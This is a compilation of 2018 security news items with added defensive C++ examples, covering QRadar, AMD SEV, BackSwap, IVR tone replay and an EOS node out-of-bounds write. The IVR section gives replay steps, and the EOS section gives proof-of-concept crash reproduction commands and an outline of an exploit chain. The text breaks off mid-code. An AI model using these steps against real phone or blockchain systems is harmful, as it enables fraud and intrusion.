Independent researcher Pedro Ribeiro discovered that IBM QRadar is affected by three potentially serious vulnerabilities, which he reported to the tech giant through Beyond Security’s SecuriTeam Secure Disclosure program.

According to IBM, the security holes impact QRadar SIEM 7.3.0 to 7.3.1 Patch 2, and QRadar SIEM 7.2.0 to 7.2.8 Patch 11. Patches are included in versions 7.3.1 Patch 3 and 7.2.8 Patch 12.

IBM has assigned a CVSS score of only 5.6 to the vulnerabilities, which it collectively tracks as CVE-2018-1418. However, the issues seem serious and an advisory in NIST’s National Vulnerability Database (NVD) shows a score of 9.8, which indicates a “critical” severity rating.

According to Beyond Security, QRadar has a built-in application for performing forensic analysis on files. While the application is disabled in the Community Edition, the code is there and part of it still works.

The application has two components: a Java servlet and the main component, which uses PHP. The first component is affected by a vulnerability that can be exploited to bypass authentication, while the second has a flaw that can be leveraged to download and execute a shell.

The flaw affecting the PHP component requires authentication, but that can be achieved by exploiting the first vulnerability. Chaining these vulnerabilities allows a remote attacker to execute arbitrary commands on the system, but only with low privileges (i.e. “nobody” user). However, Ribeiro discovered a third vulnerability that can be exploited to escalate privileges from “nobody” to root.

Beyond Security has made available technical details and proof-of-concept (PoC) code for these security holes.

Ribeiro has found many serious vulnerabilities in recent years, including in products from Netgear, NUUO, Asus, Kaseya and BMC.


Attack Bypasses AMD's Virtual Machine Encryption
29.5.2018 securityweek Attack 

A group of German researchers has devised a new attack method capable of bypassing AMD’s Secure Encrypted Virtualization (SEV).

Used by AMD data-center processors, SEV is a hardware feature that provides secure encryption of virtual machines (VMs) to protect VM memory from physical attacks and cross-VM and hypervisor-based attacks.

In a whitepaper (PDF), Fraunhofer AISEC researchers present an attack carried out from a malicious hypervisor and capable of “extracting the full contents of main memory in plaintext from SEV-encrypted virtual machines.” Named SEVered, the attack requires a remote communication service running in the VM.

The researchers say their attack can be used to extract all memory contents, even if the targeted VM is under high load. SEVered’s effectiveness was tested on a recent AMD SEV-enabled server platform running various services, in encrypted virtual machines.

SEV can transparently encrypt individual VMs using a Secure Processor (SP), where an individual key is used to encrypt the memory of each protected VM within the SP. The implementation in hardware is meant to protect the system against memory attacks, while also preventing hypervisors (HVs) from accessing sensitive VM data.

“With SEVered, we demonstrate that it is nevertheless possible for a malicious HV to extract all memory of an SEV-encrypted VM in plaintext. We base SEVered on the observation that the page-wise encryption of main memory lacks integrity protection,” the researchers note.

The HV, the whitepaper reads, is responsible for maintaining the VM’s Guest Physical Address (GPA) to Host Physical Address (HPA) mapping in main memory, which allows an attacker in control of the HV to change the memory layout of the VM in the HV.

“We use this capability to trick a service in the VM, such as a web server, into returning arbitrary pages of the VM in plaintext upon the request of a resource from outside,” the researchers explain.

For that, they first identify the encrypted pages in memory corresponding to the resource, then repeatedly send requests “for the same resource to the service while re-mapping the identified memory pages,” which results in extracting all the VM’s memory in plaintext.

“SEVered neither requires detailed knowledge of the target VM or service, nor a malicious process colluding from inside the VM. Our attack is also resistant to noise, i.e., concurrent activity in the target VM, and dynamically adapts to different noise levels,” the paper reads.

The researchers claim SEVered is feasible in practice and could allow an attacker to extract the entire memory from a SEV-protected VM within reasonable time. They also say that the attack manages critical aspects such as noise during the identification and the resource stickiness well, but note that there is room for improvements.

Software-based countermeasures, the researchers say, are insufficient to prevent the attack. The issue could be solved by providing “a full-featured integrity and freshness protection of guest-pages additional to the encryption.” However, the researchers agree that such a solution would incur a high silicon cost to protect full VMs.

“A low-cost efficient solution could be to securely combine the hash of the page’s content with the guest-assigned GPA. This ensures that pages cannot easily be swapped by changing the GPA to HPA mapping. Adding a nonce additionally ensures that an old page for the GPA cannot be replayed into the guest by a malicious HV. Integration of such an approach into AMD SEV could effectively prevent remapping,” the paper reads.
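A toy model of this countermeasure, added here and not taken from the paper or from AMD: page-wise encryption whose integrity tag either ignores or binds (content, GPA, nonce), run against the remapping and replay moves of a malicious HV. Assumed stand-ins: 16-byte pages, XOR as the cipher and FNV-1a in place of a keyed MAC; a real secure processor would track the per-GPA nonce itself.

```cpp
// Added illustration (not SEV code): why page-wise encryption alone lets a
// malicious hypervisor swap or replay pages, and how a tag bound to the
// guest-assigned GPA plus a nonce stops it. All primitives are toy stand-ins.
#include <array>
#include <cstdint>
#include <cstring>
#include <map>
#include <string>
#include <vector>

constexpr std::size_t kPageSize = 16;              // toy page size (assumption)
using Page = std::array<uint8_t, kPageSize>;

// FNV-1a as a placeholder for a keyed MAC (assumption: not cryptographic).
uint64_t fnv1a(const std::vector<uint8_t>& bytes) {
    uint64_t h = 1469598103934665603ULL;
    for (uint8_t b : bytes) { h ^= b; h *= 1099511628211ULL; }
    return h;
}

struct ProtectedPage {
    Page ciphertext;
    uint64_t tag;     // 0 when integrity binding is disabled
    uint64_t nonce;   // version the tag was computed for
};

// Model of the Secure Processor: one key per VM, page-wise encryption,
// optional tag over (ciphertext, GPA, nonce).
class SecureProcessor {
public:
    SecureProcessor(uint8_t key, bool bind_to_gpa) : key_(key), bind_(bind_to_gpa) {}

    ProtectedPage protect(const Page& pt, uint64_t gpa, uint64_t nonce) const {
        ProtectedPage p{};
        for (std::size_t i = 0; i < kPageSize; ++i) p.ciphertext[i] = pt[i] ^ key_;  // toy cipher
        p.nonce = nonce;
        p.tag = bind_ ? tag_for(p.ciphertext, gpa, nonce) : 0;
        return p;
    }

    // Decrypt the page the HV mapped for `gpa`. With binding on, the tag is
    // recomputed over (ciphertext, GPA, expected nonce); a mismatch means the
    // HV swapped in another page or replayed an old one, and access is refused.
    bool access(const ProtectedPage& p, uint64_t gpa, uint64_t expected_nonce, Page& out) const {
        if (bind_ && p.tag != tag_for(p.ciphertext, gpa, expected_nonce)) return false;
        for (std::size_t i = 0; i < kPageSize; ++i) out[i] = p.ciphertext[i] ^ key_;
        return true;
    }

private:
    uint64_t tag_for(const Page& ct, uint64_t gpa, uint64_t nonce) const {
        std::vector<uint8_t> buf(ct.begin(), ct.end());
        for (int i = 0; i < 8; ++i) buf.push_back(static_cast<uint8_t>(gpa >> (8 * i)));
        for (int i = 0; i < 8; ++i) buf.push_back(static_cast<uint8_t>(nonce >> (8 * i)));
        return fnv1a(buf);
    }
    uint8_t key_;
    bool bind_;
};

// The remapping move: the guest serves GPA 0 (a public resource) while GPA 1
// holds a secret. The HV owns the GPA->HPA map and repoints GPA 0 at the
// secret's HPA. Returns the plaintext the "service" would hand out, or "" when
// the secure processor refused the page.
std::string serve_resource_after_remap(bool bind_to_gpa) {
    SecureProcessor sp(0x5A, bind_to_gpa);
    Page resource{}, secret{};
    std::memcpy(resource.data(), "index.html page ", kPageSize);   // constructed data
    std::memcpy(secret.data(),   "TOP-SECRET-KEY!!", kPageSize);   // constructed data
    std::map<uint64_t, ProtectedPage> ram;                         // HPA -> encrypted page
    ram[100] = sp.protect(resource, /*gpa=*/0, /*nonce=*/1);
    ram[200] = sp.protect(secret,   /*gpa=*/1, /*nonce=*/1);

    std::map<uint64_t, uint64_t> gpa_to_hpa = {{0, 100}, {1, 200}};
    gpa_to_hpa[0] = 200;   // malicious HV: GPA 0 now resolves to the secret's HPA

    Page out{};
    if (!sp.access(ram.at(gpa_to_hpa.at(0)), /*gpa=*/0, /*expected_nonce=*/1, out)) return "";
    return std::string(out.begin(), out.end());
}

// The replay move: the HV snapshots GPA 0 at version 1, the guest later writes
// version 2, and the HV hands the stale snapshot back. Returns true when the
// stale page is accepted.
bool replay_accepted(bool bind_to_gpa) {
    SecureProcessor sp(0x5A, bind_to_gpa);
    Page v1{}, v2{}, out{};
    std::memcpy(v1.data(), "balance: 0000100", kPageSize);   // constructed data
    std::memcpy(v2.data(), "balance: 0000000", kPageSize);   // constructed data
    ProtectedPage old = sp.protect(v1, 0, /*nonce=*/1);      // HV keeps a copy
    ProtectedPage cur = sp.protect(v2, 0, /*nonce=*/2);      // guest's current version
    (void)cur;
    return sp.access(old, 0, /*expected_nonce=*/2, out);     // HV presents the old copy
}
```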

According to the researchers, not even AMD's SEV with Encrypted State (SEV-ES) would be immune to SEVered, as the attack does not require access to any VM state encrypted by SEV-ES.


Major Canadian Banks Investigating Data Breach Claims
29.5.2018 securityweek Incident

Two major Canadian banks informed customers on Monday that they launched an investigation after hackers claimed to have obtained personal and account information as a result of a data breach.

The targeted organizations are the Bank of Montreal (BMO) and Simplii Financial, the direct banking brand of the Canadian Imperial Bank of Commerce (CIBC). Both BMO and CIBC are among Canada’s five largest banks.

BMO believes the incident impacts less than 50,000 of its 8 million customers, and Simplii Financial says hackers may have obtained information on roughly 40,000 clients.

Both banks were contacted by hackers on Sunday. Individuals claiming to be behind the attacks told Canadian media outlets they had demanded a $1 million ransom from each bank. If the organizations refuse to pay, the information, which allegedly includes social insurance numbers, dates of birth, and financial information, would be sold to fraudsters.

BMO, which believes the attack originated from outside the country, says it has contacted authorities and potentially impacted customers.

While neither of the banks has confirmed suffering a data breach, BMO says it’s “confident that exposures identified related to customer data have been closed off.” Simplii says it’s taking the claim seriously and it has quickly implemented “enhanced online fraud monitoring and online banking security measures.”

Simplii has found no evidence that customers who bank through CIBC directly are impacted. “If a client is a victim of fraud because of this issue, we will return 100% of the money lost from the affected bank account,” the company stated.

While hackers may have gained access to the systems of Simplii and BMO, overblown claims are not uncommon in extortion schemes. There is also the possibility that the data is legitimate, but was obtained by cybercriminals through other means, such as phishing, rather than by directly breaching the banks.

On the other hand, hackers breaching the systems of banks is not unheard of. Financial organizations in the United States, Mexico, India, Russia, and Taiwan were targeted recently in sophisticated cyberattacks and had either millions of dollars or sensitive customer information stolen.


BackSwap Trojan Uses New Browser Monitoring and Injection Techniques
29.5.2018 securityweek Virus

A newly discovered banking Trojan uses innovative techniques to detect when a bank’s website is accessed and to inject malicious code into targeted pages, ESET warns.

Dubbed BackSwap, the malware no longer relies on complex process injection methods to keep track of browsing activity, but hooks key window message loop events instead.

“This is a seemingly simple trick that nevertheless defeats advanced browser protection mechanisms against complex attacks,” the security firm explains.

ESET has been tracking the actor behind this Trojan since January 2018, when they were employing clipboard malware. The hackers started using BackSwap only in March but focused heavily on its development, releasing new versions almost daily.

To distribute the malware, the actor uses malicious emails carrying a heavily obfuscated JavaScript downloader known as Nemucod. Mainly targeting Polish users, BackSwap was often found on machines also infected with Nymaim, but a strong connection between the two malware families is yet unclear.

BackSwap is delivered as modified versions of legitimate apps, with the malicious code being launched during initialization and the original code never used again, meaning that the application doesn’t work at all (as would be the case with Trojanized software).

This shows a focus on increasing stealth instead of tricking the user into believing they are running the legitimate app and also makes the malware more difficult to spot. The Trojan immediately copies itself into the startup folder to ensure persistence, and then proceeds with its nefarious functionality.

Unlike typical banking malware that injects itself into the browser’s process address space, then hooks browser-specific functions to start modifying traffic, BackSwap only works with Windows GUI elements and simulates user input.

The malware installs event hooks for a specific range of events to monitor the visited URL. It then looks for bank-specific URLs and window titles in the browser to determine when the victim is getting ready to make a wire transfer. Finally, it loads the malicious JavaScript appropriate for the corresponding bank from its resources and injects it into the browser.

Older variants copied the malicious script to the clipboard, simulated opening the browser’s developer console, pasted the clipboard content there, executed it, and then closed the console. Now, the script is executed directly from the address bar, via JavaScript protocol URLs.

The malware can target Chrome, Firefox, and Internet Explorer (in most recent versions), but the method should work on most browsers today, as long as they have a JavaScript console available or support execution of JavaScript from the address bar, ESET reveals.

A specific script is used for each targeted bank and injected into pages the malware identifies as initiating a wire transfer request. The script replaces the recipient’s bank account number with a different one, which results in money being sent to the attacker’s account instead.

“Any safeguards against unauthorized payment, such as 2-factor authorization, won’t help in this case, as the account owner is willingly sending the wire transfer,” ESET explains.

BackSwap has targeted five Polish banks in the past (PKO Bank Polski, Bank Zachodni WBK S.A., mBank, ING and Pekao), but recent variants only target three (PKO BP, mBank and ING).

Older versions relied on command and control (C&C) servers hosted on hacked WordPress websites to retrieve the fraudulent bank account numbers, but recent variants store these account numbers directly in the malicious scripts (the account numbers change often, the researchers say).

The Trojan only steals money if the wire transfer amount is in the 10,000 to 20,000 PLN range (around $2,800 to $5,600 USD).


Abusing Interactive Voice Response systems – Legacy Telecom [CVE-2018-11518]
29.5.2018 securityaffairs Vulnerability

A vulnerability tracked as CVE-2018-11518 could be exploited by attackers to carry out a phreaking attack on HCL legacy Interactive Voice Response (IVR) systems that do not use VoIP.
These IVR systems rely on audio signals at various frequencies; based on the frequency, certain commands and functions are processed. Since these frequencies are accepted within a phone call, an attacker can record them and use them to activate services or to obtain sensitive information.

Summary: Dual-tone multi-frequency signaling (DTMF) is a voice-frequency signaling scheme used in Interactive Voice Response systems (IVRs).


For each key pressed, a dial tone is created by combining the frequencies of the corresponding number’s row and column. For example, the dial tone for “5” is created by combining the frequencies 770 Hz and 1336 Hz, and the result is the tone for “5”.

Abstract: The attack is a phreaking attack on IVR systems that have not yet been fully migrated to VoIP. These Interactive Voice Response systems work on frequency: based on the frequency, certain commands and functions are processed. Since these frequencies are generated by the phone, they can be recorded and used to activate services or to obtain sensitive information for one or multiple users at the same time.
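To make the row/column encoding concrete, here is an added example (not part of the advisory) of how a receiver decodes DTMF with the Goertzel algorithm; the tones it decodes are synthesized in code, so it runs offline. Assumed: 8 kHz sampling and the standard DTMF frequency table. The point for the defender is that the detector sees only the two frequencies, so a live key press and a replayed recording look identical to it.

```cpp
// Added illustration (not from the advisory): DTMF encoding as row + column
// sinusoids, and the Goertzel-based detector an IVR front end uses to turn
// those two frequencies back into a key.
#include <cmath>
#include <cstddef>
#include <vector>

constexpr double kPi = 3.14159265358979323846;
constexpr double kSampleRate = 8000.0;                          // telephony sample rate
constexpr double kRowFreqs[4] = {697.0, 770.0, 852.0, 941.0};   // standard DTMF rows
constexpr double kColFreqs[4] = {1209.0, 1336.0, 1477.0, 1633.0}; // standard DTMF columns
constexpr char kKeypad[4][4] = {{'1', '2', '3', 'A'},
                                {'4', '5', '6', 'B'},
                                {'7', '8', '9', 'C'},
                                {'*', '0', '#', 'D'}};

// Constructed input: `ms` milliseconds of the tone for `key`, i.e. the sum of
// its row and column sinusoids ("5" is 770 Hz + 1336 Hz). Empty for unknown keys.
std::vector<double> synthesize_dtmf(char key, int ms) {
    for (int r = 0; r < 4; ++r) {
        for (int c = 0; c < 4; ++c) {
            if (kKeypad[r][c] != key) continue;
            const std::size_t n = static_cast<std::size_t>(kSampleRate * ms / 1000.0);
            std::vector<double> s(n);
            for (std::size_t i = 0; i < n; ++i) {
                const double t = static_cast<double>(i) / kSampleRate;
                s[i] = 0.5 * std::sin(2.0 * kPi * kRowFreqs[r] * t)
                     + 0.5 * std::sin(2.0 * kPi * kColFreqs[c] * t);
            }
            return s;
        }
    }
    return {};
}

// Goertzel filter: signal energy at one target frequency, without a full FFT.
double goertzel_power(const std::vector<double>& samples, double freq) {
    const double coeff = 2.0 * std::cos(2.0 * kPi * freq / kSampleRate);
    double s1 = 0.0, s2 = 0.0;
    for (double x : samples) {
        const double s0 = x + coeff * s1 - s2;
        s2 = s1;
        s1 = s0;
    }
    return s1 * s1 + s2 * s2 - coeff * s1 * s2;
}

// Decode one key press: the strongest row tone and strongest column tone pick
// the key. Returns '\0' for silence, a single tone, or tones of very unequal
// strength (the "twist" check), which is how a receiver rejects noise.
char decode_dtmf(const std::vector<double>& samples) {
    constexpr double kMinPower = 1.0;   // below this a tone group is treated as absent
    double pr[4], pc[4];
    int best_r = 0, best_c = 0;
    double sum_r = 0.0, sum_c = 0.0;
    for (int i = 0; i < 4; ++i) {
        pr[i] = goertzel_power(samples, kRowFreqs[i]);
        pc[i] = goertzel_power(samples, kColFreqs[i]);
        sum_r += pr[i];
        sum_c += pc[i];
        if (pr[i] > pr[best_r]) best_r = i;
        if (pc[i] > pc[best_c]) best_c = i;
    }
    if (pr[best_r] < kMinPower || pc[best_c] < kMinPower) return '\0';
    // Each winner must dominate its own group ...
    if (pr[best_r] < 0.8 * sum_r || pc[best_c] < 0.8 * sum_c) return '\0';
    // ... and the row and column tones must be within 10x of each other.
    if (pr[best_r] > 10.0 * pc[best_c] || pc[best_c] > 10.0 * pr[best_r]) return '\0';
    return kKeypad[best_r][best_c];
}

// Round-trips every key on the keypad through synthesis and decoding.
bool all_keys_roundtrip(int ms) {
    for (int r = 0; r < 4; ++r)
        for (int c = 0; c < 4; ++c)
            if (decode_dtmf(synthesize_dtmf(kKeypad[r][c], ms)) != kKeypad[r][c]) return false;
    return true;
}
```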

Steps to reproduce the attack:

First of all, you need a recording of the IVR frequencies, i.e., the distinct tone for each digit that the IVR takes as input. Once the frequencies are recorded as mp3, m4a or any other format, let’s begin.
Call any toll-free number (possibly 198 in India) using any telecom operator SIM. Dial the toll-free number according to your country and operator.
You will hear the recorded voice saying something like “Press 1 for English, 2 for Hindi”; this is the time to play your recorded frequency. Suppose you want to select English: play the tone for key 1 from another device or laptop, through speakers. The IVR will take this as input, process it and set your language to English.

Possible attack scenarios: In the attack scenario described above we only used the tones for keys 0-9. It is also possible to disrupt the systems, control any user’s IVR input, subscribe to services, change settings, extract information and cause a denial of service.

CVE-2018-11518 has been assigned to HCL legacy IVR systems; however, our research suggests that IVR systems belonging to vendors such as IBM, COMVIVA and SPICEDIGITAL might be vulnerable to such attacks.


The Cobalt Hacking crew is still active even after the arrest of its leader
29.5.2018 securityaffairs Hacking

Group-IB has released a new report on Cobalt group’s attacks against banks and financial sector organizations worldwide after the arrest of its leader.
Threat intelligence firm Group-IB published an interesting report titled “Cobalt: Evolution and Joint Operations” on the joint operations of the Cobalt and Anunak (Carbanak) groups after the arrest of Cobalt’s leader in March 2018.

Researchers reported that the most recent campaign associated with Cobalt group is dated May 23, 2018 and aimed at banks in Russia and CIS countries.

The analysis of the content of the spear-phishing messages suggests the attackers are also targeting western financial organizations.

Interestingly, the spear-phishing messages sent by the hackers were disguised as fake Kaspersky security alerts.

“The first wave of the phishing campaign was tracked on May 23 at 13:21 Moscow time. For the first time in Cobalt’s practice, phishing emails were sent acting as a major anti-virus vendor.” reads the press release issued by Group-IB.

“The user received a “complaint” in English that activity was recorded from their computer that violated existing legislation. The recipient was asked to read the attached letter and provide detailed explanations. If the response was not received within 48 hours, the “anti-virus company” threatened to impose sanctions on the recipient’s web resources. In order to download the letter, the user was asked to follow the link, which would then infect the Bank employee’s computer.”

Cobalt attack

Group-IB attributed the attack to Cobalt due to the involvement of Coblnt Trojan, a malware exclusively observed in campaigns of the threat actor.

The phishing emails were sent from the domain “kaspersky-corporate.com”, which was registered by the same person who registered other domains used by the Cobalt group for its campaigns.

Experts highlighted the high quality of the phishing messages: the text is in perfect English and styled as a “legal complaint”, and the fake website kaspersky-corporate.com is also of high quality. This quality suggests a possible collaboration between Cobalt and other criminal gangs such as Anunak.

The report also analyzed past attacks aimed at the SWIFT system; researchers concluded that the group’s advanced understanding of banking technology and its money laundering capabilities were the result of a collaboration with other threat actors.

“Following the 2016 SWIFT incidents, attacks involving interbank transfer systems ceased and Cobalt switched focus to other critical systems in banks such as ATMs. This was followed by Card Processing attacks which provide a safer withdraw process for Money Mules.” continues the report.

“Cobalt’s first major attack was against First Bank in Taiwan where attackers managed to steal over $2 million dollars. Following this, Cobalt was then successful in targeting the card processing systems at a bank in Kazakhstan taking over two months to prepare their attack and successfully steal $600,000 through card processing. These attacks were then perfected and intensified in 2017 across tens of incidents.”

The Cobalt group has also conducted ‘supply chain’ attacks, like the one carried out in February 2017 against a system integrator in order to later hit organizations in Russia and former CIS countries. In 2017 Cobalt infiltrated at least four other system integrators.

Cobalt’s attacks have also hit atypical targets, such as a company providing electronic wallets and payment terminals that was hit in March 2017.

The Cobalt group has continually modified its tools over the years; it has also used a modified version of the Petya ransomware to erase evidence of an attack after a failed attempt to steal from the victim’s ATM systems.

“Cobalt is still active: its members continue attacks on financial organizations and other companies worldwide,” comments Dmitry Volkov, Group-IB CTO. “We have technical proof of collaboration between Cobalt and Carbanak. In order to enable business and market regulators to take preventative measures against these criminals, we provide our customers indicators to protect them from phishing, identify the infrastructure and methods still used by these criminals.”


Hacker stole $1.35 million from cryptocurrency startup Taylor
29.5.2018 securityaffairs Cryptocurrency

Hacker stole $1.3 million from cryptocurrency startup Taylor, the development team will stop the launch of its trading app that was initially planned for this month.
The team behind the Taylor cryptocurrency trading app announced a security breach: an unknown hacker stole around $1.35 million worth of Ether from the company’s wallets.

The funds were collected by the company through an initial coin offering (ICO) round.

The attack occurred on May 22. The company is still investigating the incident, but it believes the culprit is the same hacker that supposedly hacked CypheriumChain, stealing more than 17,000 ETH.

According to the experts, the hacker stole funds from multiple companies and moved them into a wallet used as an aggregator, then transferred them to the same wallet (0x94f20ccff70d82d1579d8B11f2985F8dE9B287Cf) involved in the CypheriumChain hack in March.

“Today we arrived at the office and found out that we’ve been hacked and all of our funds have been stolen. Not only the balance in ETH (2,578.98 ETH), but also the TAY tokens from the Team and Bounty pools (more than 7% of the total supply). The only tokens that were not stolen are the ones from the Founders’ and Advisors’ pools, because there’s a vesting contract making them inaccessible for now.” reads the announcement published by the company on Medium.

“We are still investigating, but, as far as we know, the hacker is same person/group that supposedly hacked CypheriumChain (more than 17,000 ETH were stolen). “

The hacker was able to access one of the company’s devices and then gained access to one of its 1Password files; the company ruled out a smart contract exploit.

The only tokens that were not stolen by the attacker are those belonging to the Founders’ and Advisors’ pool because they were held in an inaccessible vesting contract.

The company believes the TAY tokens could soon be exchanged for other cryptocurrencies; for this reason, it asked the IDEX platform to temporarily suspend trading of TAY tokens to block the hacker. Such a countermeasure could have a dramatic effect on legitimate TAY token owners, who would not be able to trade their tokens.

Due to the hack, the Taylor team will stop the launch of its trading app that was initially planned for this month.

Some speculate this could be an exit scam.


EOS Node Remote Code Execution Vulnerability — EOS WASM Contract Function Table Array Out of Bounds
29.5.2018 securityaffairs Vulnerability

Security experts from the 360 Core Security Team have found and successfully exploited a buffer out-of-bounds write vulnerability in an EOS node when parsing a WASM file.
Vulnerability Description
We found and successfully exploited a buffer out-of-bounds write vulnerability in EOS when parsing a WASM file.

To use this vulnerability, an attacker could upload a malicious smart contract to the nodeos server; after the contract gets parsed by the nodeos server, the malicious payload could execute on the server and take control of it.

After taking control of the nodeos server, the attacker could then pack the malicious contract into a new block and further control all nodes of the EOS network.

Vulnerability Reporting Timeline
2018-5-11 EOS out-of-bounds write vulnerability found
2018-5-28 Full exploit demo compromising an EOS super node completed
2018-5-28 Vulnerability details reported to vendor
2018-5-29 Vendor fixed the vulnerability on GitHub and closed the issue
2018-5-29 Notified the vendor that the fix is incomplete

Some Telegram chats with Daniel Larimer:

We tried to report the bug to him.

He said they would not ship EOS without fixing it, and asked us to send the report privately since some people are running public test nets.

He provided his mailbox and we sent the report to him.

EOS fixed the vulnerability and Daniel said he would give acknowledgment.

Technical Detail of the Vulnerability
This is a buffer out-of-bounds write vulnerability

At libraries/chain/webassembly/binaryen.cpp (line 78), in function binaryen_runtime::instantiate_module:

    for (auto& segment : module->table.segments) {
        Address offset = ConstantExpressionRunner<TrivialGlobalManager>(globals).visit(segment.offset).value.geti32();
        assert(offset + segment.data.size() <= module->table.initial);
        for (size_t i = 0; i != segment.data.size(); ++i) {
            table[offset + i] = segment.data[i];  // <= OOB write here!
        }
    }

Here table is a std::vector containing the Names in the function table. When storing elements into the table, the |offset| field is not correctly checked. Note that there is an assert before the store which checks the offset; unfortunately, |assert| is only active in Debug builds and is compiled out of Release builds.

The table is initialized earlier in the statement:

table.resize(module->table.initial);

Here |module->table.initial| is read from the function table declaration section in the WASM file and the valid value for this field is 0 ~ 1024.

The |offset| field is also read from the WASM file, in the data section; it is a signed 32-bit value.

So basically with this vulnerability, we can write to a fairly wide range after the table vector’s memory.
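As an added illustration (not code from EOS or binaryen), the segment copy above rebuilt in isolation: the assert-only check that disappears under NDEBUG, the 32-bit wrap that a naive arithmetic check would allow, and a bounds check that survives release builds and rejects the PoC's offset of 0xffffffff. Assumed: Address is an unsigned 32-bit value, as in binaryen, and the table holds Names as strings.

```cpp
// Added example, not EOS/binaryen code: the function-table segment copy from the
// advisory, first as the vulnerable assert-only pattern, then hardened.
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

using Address = uint32_t;     // assumption: binaryen's Address is a 32-bit unsigned
using Name = std::string;     // assumption: stand-in for binaryen's Name

// The vulnerable pattern, kept only for comparison and never called here: the
// sole bounds check is an assert(). A release build defines NDEBUG, the assert
// expands to nothing, and the loop writes wherever `offset` points.
void apply_segment_assert_only(std::vector<Name>& table, Address offset,
                               const std::vector<Name>& data) {
    assert(offset + data.size() <= table.size());   // compiled out under NDEBUG
    for (std::size_t i = 0; i != data.size(); ++i) {
        table[offset + i] = data[i];                 // out-of-bounds write for a huge offset
    }
}

// What `offset + size <= initial` computes when the addition is done in 32 bits
// (a 32-bit process): 0xffffffff + 1 wraps to 0 and the check passes. This is
// the residual problem with a fix that keeps the arithmetic in Address width.
bool naive_check_passes_32bit(uint32_t offset, uint32_t size, uint32_t initial) {
    const uint32_t end = offset + size;   // wraps modulo 2^32
    return end <= initial;
}

// Hardened version: an explicit runtime check that survives NDEBUG and cannot
// wrap on either 32- or 64-bit size_t. Returns false and writes nothing when the
// segment does not fit, so the caller can reject the module.
bool apply_segment_checked(std::vector<Name>& table, Address offset,
                           const std::vector<Name>& data) {
    const std::size_t start = static_cast<std::size_t>(offset);
    if (start > table.size()) return false;               // offset already past the end
    if (data.size() > table.size() - start) return false; // subtraction cannot underflow here
    for (std::size_t i = 0; i != data.size(); ++i) {
        table[start + i] = data[i];
    }
    return true;
}

// Mirrors the shape of the PoC: a table of the maximum allowed 1024 entries and
// a segment whose offset is 0xffffffff. Returns true when the module is rejected.
bool poc_segment_is_rejected() {
    std::vector<Name> table(1024);              // table.resize(module->table.initial)
    const Address poc_offset = 0xffffffff;      // offset value used by the PoC
    const std::vector<Name> data = {"f0"};      // constructed one-entry segment
    return !apply_segment_checked(table, poc_offset, data);
}
```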

How to reproduce the vulnerability
Build the release version of latest EOS code
./eosio-build.sh

Start EOS node, finish all the necessary settings described at:
https://github.com/EOSIO/eos/wiki/Tutorial-Getting-Started-With-Contracts

Set a vulnerable contract:
We have provided a proof of concept WASM to demonstrate a crash.

In our PoC, we simply set the |offset| field to 0xffffffff so it can crash immediately when the out of bound write occurs.

To test the PoC:
cd poc
cleos set contract eosio ../poc -p eosio

If everything is OK, you will see the nodeos process get a segmentation fault.

The crash info:

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0000000000a32f7c in eosio::chain::webassembly::binaryen::binaryen_runtime::instantiate_module(char const*, unsigned long, std::vector<unsigned char, std::allocator<unsigned char> >) ()
(gdb) x/i $pc
=> 0xa32f7c <_ZN5eosio5chain11webassembly8binaryen16binaryen_runtime18instantiate_moduleEPKcmSt6vectorIhSaIhEE+2972>: mov %rcx,(%rdx,%rax,1)
(gdb) p $rdx
$1 = 59699184
(gdb) p $rax
$2 = 34359738360

Here |rdx| points to the start of the |table| vector, and |rax| is 0x7FFFFFFF8, which holds the value of |offset| * 8.
Exploit the vulnerability to achieve Remote Code Execution
This vulnerability could be leveraged to achieve remote code execution in the nodeos process, by uploading malicious contracts to the victim node and letting the node parse the malicious contract. In a real attack, the attacker may publish a malicious contract to the EOS main network.

The malicious contract is first parsed by an EOS super node; the vulnerability is triggered, and the attacker controls the super node that parsed the contract.

The attacker can steal the private key of super nodes or control content of new blocks. What’s more, attackers can pack the malicious contract into a new block and publish it. As a result, all the full nodes in the entire network will be controlled by the attacker.

We have finished a proof-of-concept exploit, and tested on the nodeos build on 64-bits Ubuntu system. The exploit works like this:

The attacker uploads malicious contracts to the nodeos server.
The server nodeos process parses the malicious contracts, which triggers the vulnerability.
With the out of bound write primitive, we can overwrite the WASM memory buffer of a WASM module instance. And with the help of our malicious WASM code, we finally achieve arbitrary memory read/write in the nodeos process and bypass the common exploit mitigation techniques such as DEP/ASLR on 64-bits OS.
Once successfully exploited, the exploit starts a reverse shell and connects back to the attacker.
You can refer to the video we provided to get some idea about what the exploit looks like, We may provide the full exploit chain later.
Fixing the Vulnerability
Bytemaster on EOS's GitHub opened issue 3498 for the vulnerability that we reported and fixed the related code.

But as Yuki noted in a comment on the commit, the fix still has problems in a 32-bit process and is not complete.

The 360 Core Security Team credited Yuki Chen of Qihoo 360 Vulcan Team and Zhiniang Peng of Qihoo 360 Core Security for the discovery of the vulnerability.
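The out-of-bounds write in the gdb session above and the remark that the fix still has problems in a 32-bit process can both be seen in a small model. The following C++ is an added example written for this page; it is not the 360 Core Security proof of concept and not the binaryen or EOS code. It models applying a WASM element segment to the runtime's table vector: the displacement the faulting instruction computes for an offset of 0xFFFFFFFF, a bounds check written as offset + count that wraps when the arithmetic is done in a 32-bit size_t (my assumption about one way a check can hold on 64-bit and fail on 32-bit; the page does not say what Yuki's comment found), and an overflow-safe form that rejects the segment before anything is written.

```cpp
// Added example for this page (not the 360 Core Security PoC, not binaryen or
// EOS code): a minimal model of applying a WASM element segment to the
// runtime's table vector, with three versions of the offset bounds check.
#include <cstddef>
#include <cstdint>
#include <stdexcept>
#include <vector>

// Module-supplied segment offset is a 32-bit WASM i32. 0xFFFFFFFF is the value
// behind the gdb session above: rax = offset * 8 = 0x7FFFFFFF8.
constexpr uint32_t kCrashOffset = 0xFFFFFFFFu;

// Byte displacement of table[offset] from the table's first element, i.e. what
// the faulting `mov %rcx,(%rdx,%rax,1)` adds to rdx when entries are 8 bytes.
uint64_t table_write_displacement(uint32_t offset) {
    return static_cast<uint64_t>(offset) * sizeof(uint64_t);
}

// The obvious check, with the sum computed in the platform's size_t. SizeT is a
// template parameter so a 32-bit build can be simulated from a 64-bit host:
// with a 32-bit SizeT, offset + count wraps, looks small, and the check passes.
template <typename SizeT>
bool naive_segment_fits(uint32_t offset, SizeT count, SizeT table_size) {
    SizeT end = static_cast<SizeT>(offset) + count;  // wraps when SizeT is 32-bit
    return end <= table_size;
}

// Overflow-safe form: never form offset + count, compare against the remaining
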